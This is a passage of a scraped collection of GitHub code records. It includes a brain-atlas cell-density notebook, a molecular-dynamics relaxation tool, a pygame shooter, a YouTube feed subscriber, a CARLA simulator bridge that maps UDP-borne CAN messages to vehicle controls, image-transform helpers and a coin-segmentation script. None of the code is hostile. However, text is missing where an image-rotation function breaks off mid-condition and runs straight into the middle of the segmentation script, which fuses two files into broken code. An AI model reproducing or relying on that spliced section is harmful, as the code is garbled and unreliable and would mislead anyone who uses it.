segment_to_id[i]=1\nassembler.assemble_all_structure_volume(segment_to_id)\n\nfrom cell_extractor.CellDetectorBase import CellDetectorBase\nanimal = 'DK41'\nbase = CellDetectorBase(animal,round = 2)\ndetections = base.load_detections()\nsure = detections[detections.predictions==2]\nsure = np.array([sure.col,sure.row,sure.section])\nsure.shape\nsure = detections[detections.predictions==2]\nunsure = detections[detections.predictions==0]\ndownsample_factor = 32\n# bin_voxel = [500,500,500]\n# bins = []\n# for i,stepi in enumerate(bin_voxel):\n# axis_max = sure.max(axis=0)[i]\n# axis_bins = list(range(0,int(axis_max)+1,stepi))\n# bins.append(axis_bins)\n# count,bins =np.histogramdd(sure,bins = bins)\n\ndata = sure[sure.section==180]\ndata = (np.array([data.col,data.row,data.section]))*np.array([0.325,0.325,20]).reshape(-1,1) #.astype(int)\n\nsection = 200\ndata = sure[sure.section==section]\ndata = (np.array([data.col,data.row,data.section]))*np.array([0.325,0.325,20]).reshape(-1,1) #.astype(int)\nsource = 'DK41'\ndestination = 'Atlas'\nplotter = Plotter()\ncontroller = SqlController('Atlas')\ntransformation = 
controller.get_transformation_row(source = source,destination = destination, transformation_type = 'Similarity')\nrigid_transform = pickle.loads(transformation.transformation)\ntfdata = rigid_transform.forward_transform_points(data.T).T/np.array([10,10,20]).reshape(-1,1)\nplt.figure(figsize=(np.array(assenbler.combined_volume.shape[:2])/50).astype(int))\nplt.imshow(assenbler.combined_volume[:,:,section])\nplt.scatter(tfdata[0],tfdata[1])\n\nfrom scipy.ndimage import zoom\ntest = zoom(assenbler.combined_volume, (0.1, 0.1, 0.1))\ntest.shape\n\nshape = test.shape\nvolume = test\nX, Y, Z = eval(f'np.mgrid[ 0:{shape[0]/2}:{shape[0]}j, \\\n 0:{shape[1]/2}:{shape[1]}j, \\\n 0:{shape[2]}:{shape[2]}j]')\ndata = sure\ndata = (np.array([data.col,data.row,data.section]))*np.array([0.325,0.325,20]).reshape(-1,1) #.astype(int)\nsource = 'DK41'\ndestination = 'Atlas'\nplotter = Plotter()\ncontroller = SqlController('Atlas')\ntransformation = controller.get_transformation_row(source = source,destination = destination, transformation_type = 'Similarity')\nrigid_transform = pickle.loads(transformation.transformation)\ntfdata = rigid_transform.forward_transform_points(data.T).T/np.array([10,10,20]).reshape(-1,1)\ndata = []\ndsfdata = tfdata*0.1*np.array([0.5,0.5,1]).reshape(-1,1)\ndata.append(go.Scatter3d(x=dsfdata[0], y=dsfdata[1], z=dsfdata[2],marker=dict(size=5,opacity=0.8),\n mode='markers'))\ndata.append(go.Volume(\n x=X.flatten(),\n y=Y.flatten(),\n z=Z.flatten(),\n value=volume.flatten(),\n isomin=1,\n isomax=40,\n opacity=0.5, # needs to be small to see through all surfaces\n surface_count=2, # needs to be a large number for good volume rendering\n ))\nfig = go.Figure(data=data)\nfig['layout']['scene']['aspectmode'] = \"data\"\n# fig.show()\nfig.write_html(\"/net/birdstore/Active_Atlas_Data/atlas.html\")\n\ndef plot_3d_volume(volume,X,Y,Z,*args,**kwargs):\n shape = volume.shape\n source = 'DK41'\n destination = 'Atlas'\n plotter = Plotter()\n controller = SqlController('Atlas')\n transformation = controller.get_transformation_row(source = source,destination = destination, transformation_type = 'Similarity')\n rigid_transform = pickle.loads(transformation.transformation)\n return go.Volume(\n x=X.flatten(),\n y=Y.flatten(),\n z=Z.flatten(),\n value=volume.flatten(),\n *args,**kwargs,\n )\n\ndata = sure\ndata = (np.array([data.col,data.row,data.section]))*np.array([0.325,0.325,20]).reshape(-1,1)\ntfdata = rigid_transform.forward_transform_points(data.T).T/np.array([10,10,20]).reshape(-1,1)\ntfdata = tfdata*0.1*np.array([1,1,2]).reshape(-1,1)\ndensity,origin,end = hist3d(tfdata)\nshape = test.shape\nX, Y, Z = eval(f'np.mgrid[ 0:{shape[0]}:{shape[0]}j, \\\n 0:{shape[1]}:{shape[1]}j, \\\n 0:{shape[2]*2}:{shape[2]}j]')\np1 = plot_3d_volume(test,X, Y, Z,isomin=1,\n isomax=40,\n opacity=0.5, \n surface_count=2, opacityscale=\"max\",)\nshape = density.shape\nX, Y, Z = eval(f'np.mgrid[ {origin[0]}:{end[0]}:{shape[0]}j, \\\n {origin[1]}:{end[1]}:{shape[1]}j, \\\n {origin[2]}:{end[2]}:{shape[2]}j]')\np2 = plot_3d_volume(density,X, Y, Z,isomin=1,\n isomax=20,\n opacity=0.5, \n surface_count=20, )\ndata = []\n# data.append(p1)\ndata.append(p2)\n# data.append(go.Scatter3d(x=tfdata[0], y=tfdata[1], z=tfdata[2],marker=dict(size=5,opacity=0.8),\n# mode='markers'))\nfig = go.Figure(data=data)\nfig['layout']['scene']['aspectmode'] = \"data\"\nfig.update_layout(scene_aspectmode=\"data\", \n scene_camera_eye=dict (x=1, y=1, z=1))\nfig.write_html(\"/net/birdstore/Active_Atlas_Data/atlas.html\")\n\n\norigin,end,end - 
origin,density.shape,tfdata.max(axis=1)\n\n\ndensity,origin,end = hist3d(tfdata)\n\n\ndensity.shape\n\n\nplt.imshow(density[:,:,15].T)\nplt.scatter(idata[0]-origin[0],idata[1]-origin[1])\n\n\n(density[density>0]).min(),density.max()\n\n\npt = density[density>1]\nplt.hist(pt.flatten())\n\n\ndef hist3d(data):\n bin_voxel = [1,1,1]\n bins = []\n for i,stepi in enumerate(bin_voxel):\n axis_max = data.max(axis=0)[i]\n axis_bins = list(range(0,int(axis_max)+1,stepi))\n bins.append(axis_bins)\n count,bins =np.histogramdd(data,bins = bins)\n return count,bins\n\n\ncount,bins = hist3d(data)\n\n\ndata = data.T\nbin_voxel = [1,1,1]\nbins = []\nfor i,stepi in enumerate(bin_voxel):\n axis_max = data.max(axis=0)[i]\n axis_bins = list(range(0,int(axis_max)+1,stepi))\n bins.append(axis_bins)\ncount,bins =np.histogramdd(data,bins = bins)\n\n\ncount,bins = np.histogramdd(data.T)\n\n\ncount.shape\n\n\nbins = []\nfor i in test.shape:\n bins.append(list(range(i+1)))\ncount,bins = np.histogramdd(data.T,bins)\n\n\ncount.shape,test.shape\n\n\n\n\n\n","repo_name":"ActiveBrainAtlas2/preprocessing-pipeline","sub_path":"in_development/Will/old/cell_density/CellDensityManager.py.py.py","file_name":"CellDensityManager.py.py.py","file_ext":"py","file_size_in_byte":8040,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"26229090523","text":"from tqdm import tqdm\nimport subprocess\nimport numpy as np\nimport os\n\nimport folder_processer as folder\nimport file_processer as file\nimport Path_pull as PP\n\ngver1 = \"GHz\"\nGHz = 10**9\n\ngvar2 = \"ps\"\nps = 10 ** -12\n\n#==========モデル関数生成==========\ndef model():\n print(\"保存先のフォルダを選択してください\")\n main_path = folder.finder()\n\n print(\"モデル関数を格納するフォルダ名を入力してください\")\n fname = input(\"フォルダ名: \")\n save_path = folder.maker(main_path, fname)\n\n end_time = float(input(\"計算時間[ps]: \"))\n tau = float(input(\"緩和時間[ps]: \"))\n dc = float(input(\"DC成分: \"))\n dt = float(input(\"時間刻み[ps]: \"))\n\n data = []\n i = 0\n time = float(0)\n while time < end_time:\n time = i * dt\n fu = np.exp(- time / tau) + dc\n data.append([time * ps, fu])\n i += 1\n\n fname = os.path.join(save_path, f\"{fname}.csv\")\n np.savetxt(f\"{fname}\",\n data,\n delimiter=\",\")\n\n print(\"\")\n print(\"モデル関数が生成されました\")\n#==========ラプラス・フーリエ変換単独実行==========\n\ndef single_LFT():\n file_path = PP.csv()\n folder_path = os.path.dirname(file_path)\n save_name = input(\"保存名: \")\n relax_path = folder.maker(folder_path, save_name)\n\n\n\n s_fre = float(input(\"開始周波数[GHz]: \"))\n e_fre = float(input(\"終端周波数[GHz]: \"))\n df = float(input(\"周波数刻み[GHz]: \"))\n\n print(\"=====Start LFT=====\")\n\n i = 0\n relax_data = []\n fre = s_fre\n csv = file.csv_reader(file_path)\n print(f\"目標周波数{e_fre}\")\n #名前 計算実行周波数\n with tqdm() as pber:\n while fre <= e_fre:\n fre = s_fre + i * df\n w = 2 * np.pi * fre * GHz\n\n re = np.sum(csv[:, 1] * np.cos(w * csv[:, 0]) * csv[1][0])\n im = np.sum(csv[:, 1] * np.sin(w * csv[:, 0]) * csv[1][0])\n\n relax_data.append([np.log10(fre * GHz), re, im])\n pber.update(df)\n i += 1\n relax = os.path.join(relax_path, f\"{save_name}.txt\")\n np.savetxt(relax, relax_data, delimiter=\"\\t\")\n\n\n# メイン部分\nwhile True:\n print(\"= \" * 40)\n print(\"モデル関数作成: 1\")\n print(\"auto-and cross-correlation function 生成: 2\")\n print(\"ラプラス・フーリエ変換: 3\")\n print(\"精度分析: 4\")\n print(\"終了コマンド: Push Enter_key\")\n ope_1 = input(\"操作番号を入力してください。(半角英数): \")\n print(\"\")\n\n if (ope_1 == \"1\"):\n model()\n elif(ope_1 == \"2\"):\n print(\"=====溶液系を選んでください=====\")\n 
print(\"Pure: 0\")\n print(\"Mixture: 1\")\n ope_2 = input(\"system: \")\n if(ope_2 == \"0\"):\n subprocess.run([\"Python\", \"Pure_dipole.py\"], check=True)\n elif(ope_2 == \"1\"):\n subprocess.run([\"Python\", \"Mix_dipole.py\"], check=True)\n elif(ope_1 == \"3\"):\n single_LFT()\n elif(ope_1 == \"4\"):\n subprocess.run([\"Python\", \"Result_Analyzer.py\"], check=True)\n elif ope_1 == \"\": # エンターキーを押した場合、MD_relaxation_maker.pyを終了する.\n print(\"<<<操作を終了します>>>\")\n break\n else: # その他の入力は再入力をようきゅされるようにwhileループさせている.\n print(\"コマンドが間違っています。最初からやり直してください\\n\")","repo_name":"nameneko0023/Molecular-Dynamics_Cal","sub_path":"MDAnalyzer/MD_analyzer/MD_relaxation_ver2.0.0.py","file_name":"MD_relaxation_ver2.0.0.py","file_ext":"py","file_size_in_byte":3457,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31762025092","text":"import pygame\n\nwhite = (255, 255, 255)\ngreen = (0, 255, 0)\nblack = (0, 0, 0)\nred = (255, 0, 0)\n\nclass Player(pygame.sprite.Sprite):\n\n def __init__(self, x, y):\n super().__init__() #calling inheritance of the sprite function\n self.image = pygame.image.load('player.png')\n self.image = pygame.transform.scale(self.image, (70, 100))\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n\nclass Bullet(pygame.sprite.Sprite):\n\n def __init__(self, playerlocation, mouselocation):\n super().__init__()\n self.image = pygame.Surface([5, 5])\n self.image.fill(red)\n self.rect = self.image.get_rect()\n self.rect.x = playerlocation[0]\n self.rect.y = playerlocation[1]\n self.direction = (playerlocation[1]-mouselocation[1])/(abs(playerlocation[0]-mouselocation[0]))*-1\n\n def update(self):\n self.rect.x += 1\n self.rect.y += self.direction\n print(\"fjfgju\")\n\n\npygame.init()\nscreenx = 600\nscreeny = 800\ndisplay_surface = pygame.display.set_mode([screenx, screeny]) # setting the screen size for the game\npygame.display.set_caption(\"SUPER STICKMAN SHOOTER\")\nfont = pygame.font.Font('AldotheApache2.ttf', 70)\nfont1 = pygame.font.Font('AldotheApache2.ttf', 90)\nfont2 = pygame.font.Font('AldotheApache2.ttf', 50)\ntext = font.render('SUPER STICKAN', True, green)\ntext1 = font1.render('SHOOTER', True, green)\ntext2 = font2.render('PRESS SPACE TO START', True, green)\ntextbound = text.get_rect()\ntextbound1 = text1.get_rect()\ntextbound2 = text2.get_rect()\ntextbound.x = ((screenx/2)-190)\ntextbound.y = 200\ntextbound1.x = ((screenx/2)- 150)\ntextbound1.y = 255\ntextbound2.x = 90\ntextbound2.y = 400\nbg1 = pygame.image.load('background1.jpeg')\nbg2 = pygame.image.load('background.jpeg')\n\nall_sprites_list = pygame.sprite.Group()\nbullets = pygame.sprite.Group()\nstickman = Player(250, 690)\n\nall_sprites_list.add(stickman)\n\nruntime = True\ndisplay_surface.blit(bg1, [0,0])\ndisplay_surface.blit(text, textbound)\ndisplay_surface.blit(text1, textbound1)\ndisplay_surface.blit(text2, textbound2)\nstart = False\n\nwhile runtime == True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n done = True\n\n keys = pygame.key.get_pressed()\n\n if keys[pygame.K_SPACE]:\n start = True\n\n\n if keys[pygame.K_a] and stickman.rect.x > 0:\n stickman.rect.x -= 10\n if keys[pygame.K_d] and stickman.rect.x < (600 - 75):\n stickman.rect.x += 10\n if keys[pygame.K_w]:\n Mouse_x, Mouse_y = pygame.mouse.get_pos()\n bullet = Bullet((stickman.rect.x, stickman.rect.y), (Mouse_x, Mouse_y))\n bullets.add(bullet)\n\n #WHILE SPACE KEY IS PRESSED STUFF HAPPEN HERE\n if start:\n display_surface.blit(bg2, [0, 0])\n 
all_sprites_list.draw(display_surface)\n bullets.update()\n bullets.draw(display_surface)\n\n pygame.display.flip()\n\npygame.quit()\n","repo_name":"notandrewsimpson/unit3game","sub_path":"pygame prokect.py","file_name":"pygame prokect.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"36729631790","text":"a=int(input(\"enter number\"))\ncount=0\ni=1\nwhile(i<=a):\n if(a%i==0):\n count=count+1\n i=i+1\nif(count==2):\n print(\"prime number\")\nelse:\n print(\"composite number\") \n\n\n\n","repo_name":"MadhavMadan336/personal-program","sub_path":"Python/to_check_whether_a_number_is_prime_or_not.py","file_name":"to_check_whether_a_number_is_prime_or_not.py","file_ext":"py","file_size_in_byte":185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33697211003","text":"def find_it(seq):\n list = []\n seq.sort()\n count = 0 \n for x in seq:\n x = str(x)\n print(seq)\n index = 0\n for num in seq:\n index += 1\n print(num)\n if num in list:\n count += 1\n print(f\"count of {num}:{count}\")\n else:\n if count != 0 and count % 2 != 0:\n print(f'count of {num}:{count} and is odd')\n print(f'returning {seq[index-2]}')\n return seq[index-2]\n else:\n count = 1\n list.append(num)\n print(f'appended {num}')\n return seq[-1]\n","repo_name":"magnustymoteus/problem-solving","sub_path":"katas/python/find-odd-int.py","file_name":"find-odd-int.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"93827846","text":"import requests\nimport json\n\n# Get secret keys from JSON file\nwith open('keys.json') as json_file:\n key = json.load(json_file)\n\ndef save():\n with open('keys.json',\"w\") as json_file:\n json_file.write(json.dumps(key, indent=4))\n\nsubscribe_url = 'https://pubsubhubbub.appspot.com/subscribe'\ndata = {\n 'hub.callback':key.get(\"callback_url\"),\n 'hub.verify': 'sync',#'async',\n 'hub.mode': 'subscribe',\n 'hub.lease_seconds': '828000'\n}\n\nwhile key.get(\"channels_todo\").get(\"channel_id\"):\n CHANNEL_ID=key.get(\"channels_todo\").get(\"channel_id\").pop(0)\n if CHANNEL_ID in key.get(\"channels_done\").get(\"channel_id\"):\n continue\n topic_url = 'https://www.youtube.com/feeds/videos.xml?channel_id=%s'%CHANNEL_ID\n data['hub.topic']=topic_url\n print(topic_url,data.get('hub.callback'))\n response = requests.post(subscribe_url, headers={'Content-Type': 'application/x-www-form-urlencoded'}, data=data)\n print(CHANNEL_ID,response.status_code,response.text)\n if response.status_code==204:\n key.get(\"channels_done\").get(\"channel_id\").append(CHANNEL_ID)\n save()\n\n\nwhile key.get(\"channels_todo\").get(\"username\"):\n USERNAME=key.get(\"channels_todo\").get(\"username\").pop(0)\n if USERNAME in key.get(\"channels_done\").get(\"username\"):\n continue\n topic_url = 'https://www.youtube.com/feeds/videos.xml?user=%s'%USERNAME\n data['hub.topic']=topic_url\n response = requests.post(subscribe_url, headers={'Content-Type': 'application/x-www-form-urlencoded'}, data=data)\n print(USERNAME,response.status_code,response.text)\n if response.status_code==204:\n key.get(\"channels_done\").get(\"username\").append(USERNAME)\n 
save()\nsave()","repo_name":"flolep2607/youtube_bck","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"9114188707","text":"#!/usr/bin/env python\n\n# ==============================================================================\n# -- find carla module ---------------------------------------------------------\n# ==============================================================================\n\n\nimport glob\nimport os\nimport sys\n\ntry:\n sys.path.append(glob.glob(os.path.join(sys.path[0],'../PythonAPI/carla/dist/carla-*%d.%d-%s.egg' % (\n sys.version_info.major,\n sys.version_info.minor,\n 'win-amd64' if os.name == 'nt' else 'linux-x86_64')))[0])\nexcept IndexError:\n pass\n\nimport carla\n\nfrom carla import ColorConverter as cc\n\nimport argparse\nimport collections\nimport datetime\nimport logging\nimport math\nimport random\nimport re\nimport weakref\nimport time\nimport socket\nimport struct\nimport json\nimport threading\n\nfrom common import load_CAN_ID\ncarlaIDMap = {}\ncarlaIDMapRPT = {}\n\ntry:\n import numpy as np\nexcept ImportError:\n raise RuntimeError('cannot import numpy, make sure numpy package is installed')\n\n\nclass World(object):\n def __init__(self, carla_world, args):\n self.world = carla_world\n try:\n self.map = self.world.get_map()\n except RuntimeError as error:\n print('RuntimeError: {}'.format(error))\n print(' The server could not send the OpenDRIVE (.xodr) file:')\n print(' Make sure it exists, has the same name of your town, and is correct.')\n sys.exit(1)\n self.sensors = None\n self.actor = None\n self.control = None\n\n def tick(self):\n self.sensors.tick()\n\n def getActor(self, id):\n print(\"Actor ID set\", id)\n self.actor = self.world.get_actor(id)\n if self.actor:\n try:\n self.control = self.actor.get_control()\n except AttributeError:\n print(\"Actor ID\", id, \"is not controllable\")\n self.actor = None\n else:\n print(\"Nothing exists for ID\", id)\n \n def get_control(self):\n return self.control\n \n def get_player(self):\n return self.actor\n\t\t\n# TODO how bad is this? 
makes code real simple but global; I think this is ok just for a simple reader / writer thread\n# handle_vid_scok thread listens on the socket and updates these variables\n# if the new_id flag has been set \ng_new_vehicle_id_available = False # global if there is a new id on the socket; set to True in sock handler set False after used\ng_new_id = 0 # the new id gotten\ng_kill = False\ndef handle_vid_sock(sock, initId):\n prevId = initId\n while True:\n try:\n viddata = sock.recv(1024)\n except socket.timeout:\n viddata = None\n\n if viddata is not None:\n if viddata == b'kill':\n global g_kill\n g_kill = True\n continue\n vid = int(viddata, 16)\n global g_new_vehicle_id_available\n global g_new_id\n # if the id has changed or we have not finished changing the last id\n if prevId != vid and not g_new_vehicle_id_available:\n g_new_id = vid\n prevId = vid\n g_new_vehicle_id_available = True\n viddata = None\n\ndef input_loop(args):\n world = None\n sensors = None\n\n try:\n client = carla.Client(args.carla_host, args.carla_port)\n client.set_timeout(2.0)\n\n try:\n world = World(client.get_world(), args)\n except RuntimeError as e:\n print(\"No response from CARLA server:\", e)\n quit()\n \n control = world.get_control()\n player = world.get_player()\n frontLights = carla.VehicleLightState.NONE\n turnLights = carla.VehicleLightState.NONE\n brakeLights = carla.VehicleLightState.NONE\n currentLight = carla.VehicleLightState.NONE\n\n\n data = ''\n with open(os.path.join(sys.path[0], args.can_id), 'r') as file:\n data = file.read()\n testDict = json.loads(data)\n data = ''\n\n vidsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)\n try:\n vidsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n except AttributeError:\n pass\n vidsock.setblocking(True)\n vidsock.bind((args.vid_ip, args.vid_port))\n vidsock.settimeout(1)\n\n if args.actor_id:\n world.getActor(args.actor_id)\n control = world.get_control()\n player = world.get_player()\n vid = args.actor_id\n \n while control is None:\n try:\n viddata = vidsock.recv(1024)\n except socket.timeout:\n viddata = None\n\n if viddata is not None:\n if viddata == b'kill':\n print(\"Got kill message; exitting\")\n quit()\n vid = int(viddata, 16)\n world.getActor(vid)\n control = world.get_control()\n player = world.get_player()\n viddata = None\n\n vid_thread = threading.Thread(target = handle_vid_sock, args = (vidsock, vid))\n vid_thread.setDaemon(True) # kill this when parent dies\n vid_thread.start()\n\n external_gears = [\"P\", \"R\", \"N\", \"D\", \"L\"]\n external_gear_idx = 0\n last_gear = 0\n last_ignition = 0\n ignition_on = False\n\n if isinstance(control, carla.VehicleControl):\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)\n try:\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n except AttributeError:\n pass\n sock.setblocking(True)\n sock.bind((args.rec_ip, args.rec_port))\n sock.settimeout(1)\n\n control.manual_gear_shift = 1\n physCtrl = player.get_physics_control()\n maxGear = len(physCtrl.forward_gears) - 1\n lastGearData = 0\n while True:\n if g_kill:\n print(\"Got kill message; exitting\")\n quit()\n global g_new_vehicle_id_available\n if g_new_vehicle_id_available:\n world.getActor(g_new_id)\n control = world.get_control()\n control.manual_gear_shift = 1\n player = world.get_player()\n g_new_vehicle_id_available = False\n\n try:\n data = sock.recv(1024)\n except socket.timeout:\n data = None\n\n if data is None:\n continue\n\n can = data.split(b\" \") #id , 
datasize, data\n \n id = int(can[0], 16)\n dataSize = int(can[1], 16) #datasize is not really needed, as it is always 8 for SLCAN\n data = int(can[2], 16)\n \n #logging.debug(\"Receive id: 0x%x, size: %x, data: %x\", id, dataSize, data)\n \n # TODO is the range on these the same between SLCAN and EXU? I think so, but the EXU values are based on trial and error\n if (id == carlaIDMap['throttle']):\n control.throttle = data / 0x3FF # scale to 0 - 1\n elif (id == carlaIDMap['steer']):\n # 2's complement conversion on 2 bytes\n if (data & (1 << (16 - 1))) != 0:\n data = data - (1 << 16)\n control.steer = data / 0x1FE # scale to -1 - 1\n elif (id == carlaIDMap['brake']):\n control.brake = data / 0x3FF # scale to 0 - 1\n if control.brake > 0: # TODO cheating a little bit doing this instead of basing it on the EXU message\n brakeLights |= carla.VehicleLightState.Brake\n else: \n brakeLights &= carla.VehicleLightState.All ^ carla.VehicleLightState.Brake\n # in mode 1, for all other values we look for the command; for gear alone we want the report \n #elif id == 119: #in mode 1 109 and 119 are the same?\n elif (id == carlaIDMap['gear']):\n if last_gear != data:\n if data == 1: # gear up : L towards P\n external_gear_idx = max(0, external_gear_idx - 1) # can't go past P\n elif data == 2: # gear down : P towards L\n external_gear_idx = min(len(external_gears) - 1, external_gear_idx + 1)\n last_gear = data\n data = external_gear_idx + 1\n # comment out above if applying directly\n #print(\"Inc:\", last_gear, \"gear:\", external_gears[external_gear_idx])\n control.reverse = False\n if data == 1: # P\n control.gear = 0\n elif data == 2: # R\n control.reverse = True\n control.gear = -1\n elif data == 3: # N\n control.gear = 0\n elif data == 4: # D TODO? should switch off manual shift for this and L?\n control.gear = 3\n elif data == 5:\n control.gear = 1 # L\n else:\n logging.debug(\"Bad value for gear %d\", data)\n\n if control.reverse:\n brakeLights |= carla.VehicleLightState.Reverse\n else:\n brakeLights &= carla.VehicleLightState.All ^ carla.VehicleLightState.Reverse\n # https://carla.readthedocs.io/en/latest/python_api/#carlavehiclelightstate\n elif (id == carlaIDMap['lightFront']):\n #print(\"light front \", hex(id), \":\", data)\n frontLights = carla.VehicleLightState.NONE\n if data & 1:\n frontLights |= carla.VehicleLightState.Position\n if data & 2:\n frontLights |= carla.VehicleLightState.LowBeam\n if data & 4:\n frontLights |= carla.VehicleLightState.HighBeam\n #logging.error(\"Unknown front light state: \" + str(data))\n elif (id == carlaIDMap['lightTurn']):\n #print(\"light turn \", id, \":\", data)\n if data == 0:\n turnLights = carla.VehicleLightState.NONE\n elif data == 1:\n turnLights = carla.VehicleLightState.LeftBlinker \n elif data == 2:\n turnLights = carla.VehicleLightState.RightBlinker \n elif data & 4 != 0:\n turnLights = carla.VehicleLightState.LeftBlinker | carla.VehicleLightState.RightBlinker \n elif (id == carlaIDMap['hand_brake']):\n control.hand_brake = data==1\n #elif (id == carlaIDMap['ignition']):\n # if last_ignition == 0 and data == 1:\n # ignition_on = not ignition_on\n # last_ignition = data\n elif (id == carlaIDMap['engine']):\n ignition_on = data\n #else:\n # logging.error(f\"Unknown ID {id}\")\n currentLight = frontLights | turnLights | brakeLights\n player.set_light_state(carla.VehicleLightState(currentLight))\n\n if not ignition_on:\n control.throttle = 0\n\n if player.get_control().gear == 1 and (external_gear_idx != 4):\n if control.throttle != 1.0:\n control.throttle += 0.000001\n else:\n control.throttle -= 
0.000001\n\n player.apply_control(control)\n\n else:\n print(\"This actor id is not a vehicle\\n\")\n\n finally:\n print(\"Exiting\")\n\n\n# ==============================================================================\n# -- main() --------------------------------------------------------------------\n# ==============================================================================\n\n\ndef main():\n argparser = argparse.ArgumentParser(\n description='CARLA Manual Control Client')\n argparser.add_argument(\n '-v', '--verbose',\n action='store_true',\n dest='debug',\n help='print debug information')\n argparser.add_argument(\n '--rec_ip',\n default='127.0.0.1',\n help='Receive IP (default: 127.0.0.1)')\n argparser.add_argument(\n '--rec_port',\n metavar='P',\n default=3001,\n type=int,\n help='UDP port to listen on (default: 3001)')\n argparser.add_argument(\n '--vid_ip',\n default='127.0.0.1',\n help='Vehicle ID Receive IP (default: 127.0.0.1)')\n argparser.add_argument(\n '--vid_port',\n default=3002,\n type=int,\n help='UDP port to listen on (default: 3002)')\n argparser.add_argument(\n '--id',\n dest='actor_id',\n type=int,\n help='[Optional] initial value to use for actor ID. Will be overwritten by IDs incoming on UDP connection on vid_ip:vid_port'\n )\n argparser.add_argument(\n '--carla_host',\n metavar='H',\n default='127.0.0.1',\n help='IP of the host server (default: 127.0.0.1)')\n argparser.add_argument(\n '--carla_port',\n metavar='P',\n default=2000,\n type=int,\n help='TCP port to connect to (default: 2000)')\n argparser.add_argument(\n '--can_id',\n default='CAN_ID.json',\n help='Path to file containing CAN_IDs for messages (default CAN_ID.json in current directory)'\n )\n argparser.add_argument(\n '--use_ECU_Tester',\n action='store_true',\n default=False,\n help='Whether to receive command messages (default) or report.'\n )\n argparser.add_argument(\n '--mode',\n default=1,\n type = int,\n choices=[1],\n help='Mode to operate in; see main.py for full details.'\n )\n args = argparser.parse_args()\n\n log_level = logging.DEBUG if args.debug else logging.INFO\n logging.basicConfig(format='%(levelname)s: %(message)s', level=log_level)\n\n logging.info('listening to server %s:%s and %s:%s', args.rec_ip, args.rec_port, args.vid_ip, args.vid_port)\n\n global carlaIDMap, carlaIDMapRPT\n # load the CAN-IDs with report tag for variables we care about\n # (want to read status not change it)\n canType = 'report' if args.use_ECU_Tester else 'command'\n carlaIDMap = load_CAN_ID(canType, args.can_id)\n # bit messy but need the engine report in all instances\n if 'engine' not in carlaIDMap:\n carlaIDMapRPT = load_CAN_ID('report', args.can_id)\n carlaIDMap['engine'] = carlaIDMapRPT['engine']\n\n try:\n input_loop(args)\n\n except KeyboardInterrupt:\n print('\\nCancelled by user. 
Bye!')\n\n\nif __name__ == '__main__':\n\n main()\n","repo_name":"pasta-auto/CARLA-PASTA","sub_path":"data_in_can_udp.py","file_name":"data_in_can_udp.py","file_ext":"py","file_size_in_byte":15162,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"5663107091","text":"import cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport math\nimg = cv2.imread('GeometricTransformation/red_panda.jpg')\n\ndef translate(image, tx, ty):\n img_t = np.zeros_like(image)\n img_t[:-ty,:-tx] = image[ty:,tx:]\n\n return img_t\n\ndef scale(image, sw, sh):\n if(sw<0 or sh<0):\n raise Exception(\"Sorry, no numbers below zero\")\n\n img_s = np.zeros_like(image)\n img_s = image[::sw,::sh]\n \n return img_s\n\ndef rotation(image, degree):\n img_r = np.zeros_like(image)\n rads = math.radians(degree)\n\n original_width, original_height, channel = image.shape\n\n midx,midy = (original_width//2, original_height//2)\n\n for i in range(original_width):\n for j in range(original_height):\n x= (i-midx)*math.cos(rads)+(j-midy)*math.sin(rads)\n y= -(i-midx)*math.sin(rads)+(j-midy)*math.cos(rads)\n\n x=round(x)+midx \n y=round(y)+midy \n\n if (x>=0 and y>=0 and x binarizado\nplt.imshow(mascara, cmap='gray');\n\nfrom skimage import morphology\nfrom skimage.morphology import disk\n\nmascara_limpia = morphology.remove_small_objects(mascara)\nmascara_limpia = ~morphology.remove_small_objects(~mascara)\n\nplt.imshow(mascara_limpia, cmap='gray');\n\n#plt.imshow(coins, cmap='gray');\n\nmascara_de_fondo = ~mascara_limpia\n\nimg.setflags(write=1)\nimg[mascara_de_fondo] = 0\ngris[mascara_de_fondo] = 0\nplt.imshow(img);\n\nfrom scipy import ndimage as ndi\nfrom matplotlib.colors import ListedColormap\n\ndistancia_imagen = ndi.distance_transform_edt(mascara_de_fondo)\nprint('distance transform:', distancia_imagen.shape, distancia_imagen.dtype)\n\nfrom skimage import feature, measure\n\ndef imshow_overlay(im, mask, alpha=0.5, color='red', **kwargs):\n \"\"\"Show semi-transparent red mask over an image\"\"\"\n mask = mask > 0\n mask = np.ma.masked_where(~mask, mask) \n plt.imshow(im, **kwargs)\n plt.imshow(mask, alpha=alpha, cmap=ListedColormap([color]))\n\n\ndef watershed_segmentation(mask):\n distancia_imagen = ndi.distance_transform_edt(mask)\n peaks = feature.peak_local_max(distancia_imagen, indices=True)\n peaks_im = np.zeros(distancia_imagen.shape, dtype=bool)#zero matrix with the shape of the mask\n for row, col in peaks:\n peaks_im[row, col] = 1\n marcadores_imagen = measure.label(peaks_im)\n etiqueta_imagen = morphology.watershed(-distancia_imagen, marcadores_imagen, mask=mask)\n return etiqueta_imagen\n\n\netiqueta_moneda = watershed_segmentation(mascara_limpia)\n\nplt.imshow(etiqueta_moneda)\n\nregions = measure.regionprops(etiqueta_moneda)\n\nplt.imshow(img)\n\nfor region in regions:\n y, x = region.centroid\n area = region.area\n area_str = '%.1f' % (area/100)\n\nmin_5 = 61000\nmax_5=62000\nmin_10 = 